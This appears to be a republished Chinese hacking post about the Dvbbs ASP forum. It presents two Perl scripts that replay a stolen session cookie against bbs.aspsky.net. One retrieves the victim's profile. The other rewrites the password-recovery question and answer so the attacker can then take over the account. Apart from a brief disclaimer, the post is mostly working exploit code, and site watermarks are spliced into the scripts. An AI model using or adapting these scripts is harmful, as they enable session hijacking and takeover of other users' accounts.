by superdao superdao@21cn.com
http://www.china4lert.org
对动网先锋asp
论坛的安全性分析----跨站脚本攻击应用(shocknet)的文章大家不知道看过没有,动网
论坛密码和提示问题答案是md5加密过的,拿到cookie也没什么价值。
我们可以换一种思路,拿到cookie后,通过发送一个请求取的用户的相关资料,然后再发送个请求修改用户提示问题以及答案。
声明:
以下的两个脚本尽供参考,请勿用作非法用途,否则一切后果自负!
hiallone是我在动网
论坛注册的用来测试的用户,大家可以看看演示效果
http://enter.3322.net/cgi-bin/dongw.cgi
http://enter.3322.net/cgi-bin/dongw1.cgi
#!/usr/bin/perl
#取得用户资料
# http://enter.3322.net/cgi-bin/dongw.cgi
use Socket;
$host = "bbs.aspsky.net";
$port = 80;
$str = "";
$len =length($str);
$req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n".
"Host: $host\r\n".
中国网管论坛bbs.bitsCN.com
"Accept: */*\r\n".
"Cookie: aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&upNum=
1;\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: $len\n\n".
"$str\n\n";
@re =sendraw($req);
print "Content-type: text/html\n\n";
print "@re";
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
-------------------------------------------------------------------------------------------------------
网管bitscn_com
#!/usr/bin/perl
#修改提示问题以及答案,在这里我们可以修改quesion=whoami21&answer=superdao
#那么你可以去改他的密码了,呵呵!
#http://enter.3322.net/cgi-bin/dongw1.cgi
use Socket;
$host = "bbs.aspsky.net";
$port = 80;
$str = 'Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao&oldanswer=
076d0cca420653d4&Email=o00o@800e.net&birthyear=&birthmonth=&birthday=&face=Pic%2FImage1.gif&myface=
Pic%2FImage1.gif&width=22&height=22&URL=&groupname=%CE%DE%C3%C5%CE%DE%C5%C9&OICQ=&ICQ=&msn=&showRe=
1&Signature=&usercookies=0&Submit=%B8%FC+%D0%C2';
$len =length($str);
$req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n".
网管下载dl.bitscn.com
"Cookie: aspsky=upNum=1&password=965eb72c92a549dd&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=hiallone&usercookies=
0\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\n\n".
"$str\n\n";
@re =sendraw($req);
print "Content-type: text/html\n\n";
print "@re";
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
评论加载中…
